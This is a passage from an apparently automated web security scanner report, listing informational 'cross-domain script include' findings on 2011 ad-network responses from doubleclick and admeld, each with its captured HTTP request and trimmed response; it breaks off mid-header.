<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><!-- Google Code for
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
<!-- "Ad Words House Advertiser" c/o "Google Internal Marketing", segment: 'Business Solutions' - DO NOT MODIFY THIS PIXEL IN ANY WAY -->
<script src="http://segment-pixel.invitemedia.com/pixel?pixelID=38627&partnerID=216&clientID=4608&key=segment&returnType=js"></script>
...[SNIP]...
11.24. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /pagead/ads?client=ca-pub-8682976704480862&output=html&h=90&slotname=7528172226&w=728&lmt=1302370206&flash=10.2.154&url=http%3A%2F%2Fwww.wptz.com%2Fnews%2Findex.html&dt=1302352206610&bpp=4&shv=r20110330&jsv=r20110321-2&correlator=1302352206660&frm=0&adk=1371640718&ga_vid=1441694128.1302352179&ga_sid=1302352179&ga_hid=256498022&ga_fc=1&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1063&bih=1038&ref=http%3A%2F%2Fwww.wptz.com%2Findex.html&fu=0&ifi=1&dtd=91&xpc=MJP4sbjUnE&p=http%3A//www.wptz.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 09 Apr 2011 12:30:13 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 12529

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#000000;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...
11.25. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pagead/ads?client=ca-pub-5597875046540809&output=html&h=250&slotname=6415844257&w=300&lmt=1302639807&flash=10.2.154&url=http%3A%2F%2Fwww.mvtimes.com%2Farchives%2F&dt=1302621807836&shv=r20110406&jsv=r20110406&saldr=1&prev_slotnames=7816900575&correlator=1302621806890&frm=0&adk=3606988145&ga_vid=1489843502.1302621734&ga_sid=1302621734&ga_hid=1000755112&ga_fc=1&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1063&bih=1038&eid=33895130&ref=http%3A%2F%2Fwww.mvtimes.com%2Fexpired.php&fu=0&ifi=2&dtd=3&xpc=MpcJCrCkh9&p=http%3A//www.mvtimes.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.mvtimes.com/archives/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110409%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110409%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110409%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110409%3A1

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Tue, 12 Apr 2011 15:23:33 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 1647

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script><script src="http://ib.adnxs.com/ab?enc=exSuR-H6EUB7FK5H4foRQAAAAMDMzAhAexSuR-H6EUB7FK5H4foRQLUT8t-jzrw88f5MdWfsOnh1bqRNAAAAABUbAAC1AAAANQEAAAIAAADXfgQA0WMAAAEAAABVU0QAVVNEACwB-gC1GHIACQ0BAgUCAAQAAAAA-STxIQAAAAA.&tt_code=&udj=uf%28%27a%27%2C+537%2C+1302621813%29%3Buf%28%27c%27%2C+5740%2C+1302621813%29%3Buf%28%27r%27%2C+294615%2C+1302621813%29%3Bppv%28783%2C+%274376600141129454517%27%2C+1302621813%2C+1303053813%2C+5740%2C+25553%29%3B&cnd=!aBajcAjsLBDX_REYACDRxwEocjFmZmY-4foRQEITCAAQABgAIAEo_v__________AUgAUABYtTFgAGi1Ag..&referrer=http://www.mvtimes.com/archives/&pp=TaRudAAOmcEK2iJJnHAOj8xH-ELt9_fRJKHPFw&pubclick=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBcy5KdG6kTcGzOsnE6AaPncDjCe_675oCp439xBrv8I6PDAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi01NTk3ODc1MDQ2NTQwODA5sgEPd3d3Lm12dGltZXMuY29tugEKMzAweDI1MF9hc8gBCdoBIGh0dHA6Ly93d3cubXZ0aW1lcy5jb20vYXJjaGl2ZXMvmALmC8ACBMgCq4KlDqgDAegDsCroA7II9QMABABE9QMgAAAAgAa-s939482e0DA%26num%3D1%26sig%3DAGiWqtxHWBRy21Ia8A2Ufi3YH0WXYgOK8w%26client%3Dca-pub-5597875046540809%26adurl%3D"></script>
...[SNIP]...
11.26. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pagead/ads?client=ca-pub-2103553853082603&output=html&h=250&slotname=8163847123&w=300&lmt=1302370791&flash=10.2.154&url=http%3A%2F%2Fwww.wcax.com%2FGlobal%2Fcategory.asp%3FC%3D18836&dt=1302352790373&bpp=3&shv=r20110330&jsv=r20110321-2&correlator=1302352791028&frm=0&adk=2815960337&ga_vid=1677852705.1302352791&ga_sid=1302352791&ga_hid=1970402529&ga_fc=0&u_tz=-300&u_his=5&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1063&bih=1038&ref=http%3A%2F%2Fwww.wcax.com%2F&fu=0&ifi=1&dtd=812&xpc=EGUpOMD3fC&p=http%3A//www.wcax.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110409%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110409%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110409%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110409%3A1

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 09 Apr 2011 12:39:57 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 1701

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script><script src="http://ib.adnxs.com/ab?enc=KFyPwvUoDkApXI_C9SgOQAAAAMDMzARAKVyPwvUoDkApXI_C9SgOQMhZn8QGScMa8f5MdWfsOnidU6BNAAAAAEchAAC1AAAANQEAAAIAAADbfgQA0WMAAAEAAABVU0QAVVNEACwB-gAwC1UA4gUBAgUCAAQAAAAATSLwCgAAAAA.&tt_code=vert-16&udj=uf%28%27a%27%2C+537%2C+1302352797%29%3Buf%28%27c%27%2C+5740%2C+1302352797%29%3Buf%28%27r%27%2C+294619%2C+1302352797%29%3Bppv%28783%2C+%271928465358862113224%27%2C+1302352797%2C+1302784797%2C+5740%2C+25553%29%3B&cnd=!rhTiMQjsLBDb_REYACDRxwEoVTEAAACw9SgOQEITCAAQABgAIAEo_v__________AUgAUABYsBZgAGi1Ag..&referrer=http://www.wcax.com/Global/category.asp&pp=TaBTnQAErxsK5XIEsatUZyS2vMMbWLuZP7exLA&pubclick=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB6bkQnVOgTZveEoTklQfnqK2NC-_675oCp439xBqP_I6PDAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi0yMTAzNTUzODUzMDgyNjAzsgEMd3d3LndjYXguY29tugEKMzAweDI1MF9hc8gBCdoBL2h0dHA6Ly93d3cud2NheC5jb20vR2xvYmFsL2NhdGVnb3J5LmFzcD9DPTE4ODM2mALoG8ACBMgCq4KlDqgDAegDEOgD1CroA-cC9QMAAABE9QMgAAAAgAa-s939482e0DA%26num%3D1%26sig%3DAGiWqtxndgaio4wOQ4d3JMhys8mZPCymmQ%26client%3Dca-pub-2103553853082603%26adurl%3D"></script>
...[SNIP]...
11.27. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /pagead/ads?client=ca-pub-2103553853082603&output=html&h=250&slotname=8163847123&w=300&lmt=1302370441&flash=10.2.154&url=http%3A%2F%2Fwww.wcax.com%2FGlobal%2Fcategory.asp%3FC%3D18836&dt=1302352441841&bpp=2&shv=r20110330&jsv=r20110321-2&correlator=1302352441890&frm=0&adk=2815960337&ga_vid=781804837.1302352442&ga_sid=1302352442&ga_hid=1165843074&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1063&bih=1038&fu=0&ifi=1&dtd=142&xpc=ZSTKMvhTAq&p=http%3A//www.wcax.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 09 Apr 2011 12:34:10 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 4368

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...
11.28. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pagead/ads?client=ca-pub-2103553853082603&output=html&h=250&slotname=8163847123&w=300&lmt=1302370522&flash=10.2.154&url=http%3A%2F%2Fwww.wcax.com%2FGlobal%2Fcategory.asp%3FC%3D18836&dt=1302352522769&bpp=3&shv=r20110330&jsv=r20110321-2&correlator=1302352522793&frm=0&adk=2815960337&ga_vid=983270927.1302352523&ga_sid=1302352523&ga_hid=1867116075&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1063&bih=1038&ref=http%3A%2F%2Fwww.wcax.com%2FGlobal%2Fcategory.asp%3FC%3D18963&fu=0&ifi=1&dtd=103&xpc=mxzeQN3016&p=http%3A//www.wcax.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110409%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110409%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110409%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110409%3A1

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 09 Apr 2011 12:35:29 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 1507

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script>
<script type='text/javascript' src='http://c1.rfihub.net/js/bcS.js'></script>
...[SNIP]...
11.29. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pagead/ads?client=ca-pub-2103553853082603&output=html&h=250&slotname=6973263501&w=300&lmt=1302370451&flash=10.2.154&url=http%3A%2F%2Fwww.wcax.com%2FGlobal%2Fcategory.asp%3FC%3D18197&dt=1302352451303&bpp=2&shv=r20110330&jsv=r20110321-2&correlator=1302352451347&frm=0&adk=3713764857&ga_vid=2033131009.1302352452&ga_sid=1302352452&ga_hid=753737825&ga_fc=0&u_tz=-300&u_his=5&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1063&bih=1038&eid=36813005&ref=http%3A%2F%2Fwww.wcax.com%2F&fu=0&ifi=1&dtd=384&xpc=9pTvkhsWFJ&p=http%3A//www.wcax.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 09 Apr 2011 12:34:19 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 1549

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script>
<script type="text/javascript" src="http://a.adroll.com/j/rolling.js"></script>
...[SNIP]...
11.30. http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/3/foxnews/300x250/politics-bottom

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /ad/iframe/3/foxnews/300x250/politics-bottom?t=1302538875812&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=e36a2f20-9985-4dcd-82e9-6ff0312e024e

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
X-AdMeld-Debug: eyB0eXBlOiAgICAgICAgICJtZWxkIiwgIHB1YjogICAgICAgICAgMywgIHNpdGU6ICAgICAgICAgImZveG5ld3MiLCAgYWQ6ICAgICAgICAgICA0NDAxNjgzLCAgbmV0d29yazogICAgICAidHVybiIsICBzaXplOiAgICAgICAgICIzMDB4MjUwIiwgIGZyZXE6ICAgICAgICAgIjEtMiIsICBkZWZhdWx0czogICAgICIwLTAiLCAgcmVxdWVzdDogICAgICAiNjY4Mzc1MTctNDU3ZS00NjgyLWE0OTQtYTAyMDUwNDhkOWY3IiwgIHVzZXI6ICAgICAgICAgImUzNmEyZjIwLTk5ODUtNGRjZC04MmU5LTZmZjAzMTJlMDI0ZSIsICBjb3VudHJ5OiAgICAgICJVUyIsICBjaXR5OiAgICAgICAgICJEYWxsYXMiLCAgZG1hOiAgICAgICAgICA2MjMsICByZWdpb246ICAgICAgICJUWCIsICBpcDogICAgICAgICAgICIxNzMuMTkzLjIxNC4yNDMiLCAgZGVwdGg6ICAgICAgICAxLCAgdGFyZ2V0OiAgICAgICAicG9saXRpY3MtYm90dG9tIiwgIGRpdjogICAgICAgICAgIjY2ODM3NTE3LTQ1N2UtNDY4Mi1hNDk0LWEwMjA1MDQ4ZDlmNyIsICB1cmw6ICAgICAgICAgICJodHRwOi8vd3d3LmZveG5ld3MuY29tL3BvbGl0aWNzL2luZGV4Lmh0bWwiLCAgZWxhcHNlZDogICAgICAwLCAgZGVjaXNpb246ICAgICAiYWQiLCAgaW1wOiAgICAgICAgICAxLCAgbmV0d29ya19pZDogICAyNCwgIGFjY291bnRfaWQ6ICAgNTQsICBuZXR3b3JrX25hbWU6ICJUdXJuIiwgIHB1Ymxpc2hlcl9uYW1lOiAiZm94bmV3cyIsICBlY3BtOiAgICAgICAgICIxLjM3IiwgIGZlY3BtOiAgICAgICAgIjEuMzciLCAgZmlsbDogICAgICAgICAiMTMuNjMiLCAgcGxhY2VtZW50OiAgICAicG9saXRpY3MtYm90dG9tIiwgIHJ1bGU6ICAgICAgICAgInBvbGl0aWNzLWJvdHRvbSIsICBjcmVhdGl2ZV9pZDogICIiLCAgYmlkZGVyczogICAgICBbeyJuZXR3b3JrX25hbWUiOiJNYXhQb2ludCBJbnRlcmFjdGl2ZSAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjYzMDQ5LCAiYnV5IjoxNzYsImxwIjoiIiwiYW4iOiIiLCJzdGF0dXMiOiJubyBiaWQiLCJmaWQiOjAsICJmY3BtIjoiMC4wMCJ9LHsibmV0d29ya19uYW1lIjoiTWVkaWFNYXRoIChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6MTk3MTgxLCAiYnV5Ijo1MDMsImxwIjoiIiwiYW4iOiIiLCJzdGF0dXMiOiJubyBiaWQiLCJmaWQiOjAsICJmY3BtIjoiMC4wMCJ9LHsibmV0d29ya19uYW1lIjoiTWVkaWE2IERlZ3JlZXMgKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjoyMTQxMDc5LCAiYnV5IjozMzExLCJscCI6Imh0dHA6Ly93d3cudmlyZ2luYW1lcmljYS5jb20vdngvYm9va2luZy9leGl0LWhhcHBpZXI/Y2lkPWRpc18wMDA3NiIsImFuIjoiIiwic3RhdHVzIjoiMS4yMyBOIiwiZmlkIjo0ODkyLCAiZmNwbSI6IjEuNzUifSx7Im5ldHdvcmtfbmFtZSI6IlR1YmVtb2d1bCAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjU4OTU4MDgsICJidXkiOjg0NzEsImxwIjoiIiwiYW4iOiIiLCJzdGF0dXMiOiJubyBiaWQiLCJmaWQiOjAsICJmY3BtIjoiMC4wMCJ9LHsibmV0d29ya19uYW1lIjoiVHVybiAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjYyODk3LCAiYnV5IjoxODksImxwIjoiaHR0cDovL3d3dy5ob21lZGVwb3QuY29tLyIsImFuIjoiSG9tZSBEZXBvdCIsInN0YXR1cyI6IjEuNDEiLCJmaWQiOjQ4OTIsICJmY3BtIjoiMS43NSJ9LHsibmV0d29ya19uYW1lIjoiRGF0YVh1IChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6NjI5NzksICJidXkiOjE5OSwibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIGJpZCIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn1dLCAgdGFyZ2V0aW5nOiAgICAiIiwgIGFkdmVydGlzZXI6ICAgICIiLCAgbGFuZGluZ19wYWdlOiAgICAiIiwgIGhvc3Q6ICAgICAgICAgIm5qLXRhZzQ1In0=
Content-Length: 1838
Content-Type: text/html
Date: Mon, 11 Apr 2011 16:21:18 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:px;height:px;margin:0;border:0">


<s
...[SNIP]...
</iframe>

<script type="text/javascript" src="http://pixel.invitemedia.com/admeld_sync?admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&admeld_adprovider_id=300&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match"></script>
...[SNIP]...
11.31. http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/3/foxnews/300x250/politics-bottom

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /ad/iframe/3/foxnews/300x250/politics-bottom?01AD=3dZ1qbCz91FPnjVHDJXbeA0jLtbKsNzTxEhbEx_A94nsZCfYiQf1UrA&01RI=90A4C54ACA8290D&01NA=&t=1302538875812&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=e36a2f20-9985-4dcd-82e9-6ff0312e024e; D41U=CT-1

Response

HTTP/1.1 200 OK
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
X-AdMeld-Debug: eyB0eXBlOiAgICAgICAgICJtZWxkIiwgIHB1YjogICAgICAgICAgMywgIHNpdGU6ICAgICAgICAgImZveG5ld3MiLCAgYWQ6ICAgICAgICAgICAzMTM4NzI1LCAgbmV0d29yazogICAgICAiYWRjb20iLCAgc2l6ZTogICAgICAgICAiMzAweDI1MCIsICBmcmVxOiAgICAgICAgICIxLTQiLCAgZGVmYXVsdHM6ICAgICAiMC0wIiwgIHJlcXVlc3Q6ICAgICAgIjZjNGUxYjNjLThhZDItNDlhNi1hZGE2LTU4ZTgwOTYwNDhkZSIsICB1c2VyOiAgICAgICAgICJlMzZhMmYyMC05OTg1LTRkY2QtODJlOS02ZmYwMzEyZTAyNGUiLCAgY291bnRyeTogICAgICAiVVMiLCAgY2l0eTogICAgICAgICAiRGFsbGFzIiwgIGRtYTogICAgICAgICAgNjIzLCAgcmVnaW9uOiAgICAgICAiVFgiLCAgaXA6ICAgICAgICAgICAiMTczLjE5My4yMTQuMjQzIiwgIGRlcHRoOiAgICAgICAgMSwgIHRhcmdldDogICAgICAgInBvbGl0aWNzLWJvdHRvbSIsICBkaXY6ICAgICAgICAgICI2YzRlMWIzYy04YWQyLTQ5YTYtYWRhNi01OGU4MDk2MDQ4ZGUiLCAgdXJsOiAgICAgICAgICAiaHR0cDovL3d3dy5mb3huZXdzLmNvbS9wb2xpdGljcy9pbmRleC5odG1sIiwgIGVsYXBzZWQ6ICAgICAgMCwgIGRlY2lzaW9uOiAgICAgImFkIiwgIGltcDogICAgICAgICAgNSwgIG5ldHdvcmtfaWQ6ICAgMSwgIGFjY291bnRfaWQ6ICAgMTMsICBuZXR3b3JrX25hbWU6ICJBZHZlcnRpc2luZy5jb20iLCAgcHVibGlzaGVyX25hbWU6ICJmb3huZXdzIiwgIGVjcG06ICAgICAgICAgIjAuODYiLCAgZmVjcG06ICAgICAgICAiMC44NiIsICBmaWxsOiAgICAgICAgICI0NS41MCIsICBwbGFjZW1lbnQ6ICAgICJwb2xpdGljcy1ib3R0b20iLCAgcnVsZTogICAgICAgICAicG9saXRpY3MtYm90dG9tIiwgIGNyZWF0aXZlX2lkOiAgIiIsICBiaWRkZXJzOiAgICAgIFt7Im5ldHdvcmtfbmFtZSI6Ik1heFBvaW50IEludGVyYWN0aXZlIChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6NjMwNDksICJidXkiOjE3NiwibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIGJpZCIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn0seyJuZXR3b3JrX25hbWUiOiJNZWRpYU1hdGggKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjoxOTcxODEsICJidXkiOjUwMywibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIGJpZCIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn0seyJuZXR3b3JrX25hbWUiOiJ4KzEgKFJUQikiLCAiYm